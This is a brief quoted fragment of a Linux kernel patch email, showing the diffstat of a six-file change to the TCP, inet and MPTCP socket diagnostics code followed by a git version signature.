> net/ipv4/inet_diag.c | 13 ++
> net/ipv4/inet_hashtables.c | 18 --
> net/ipv4/tcp_diag.c | 338 +++++++++++++++++++++++++---------
> net/mptcp/mptcp_diag.c | 124 +++++++++----
> 6 files changed, 383 insertions(+), 143 deletions(-)
>
> --
> 2.43.0
>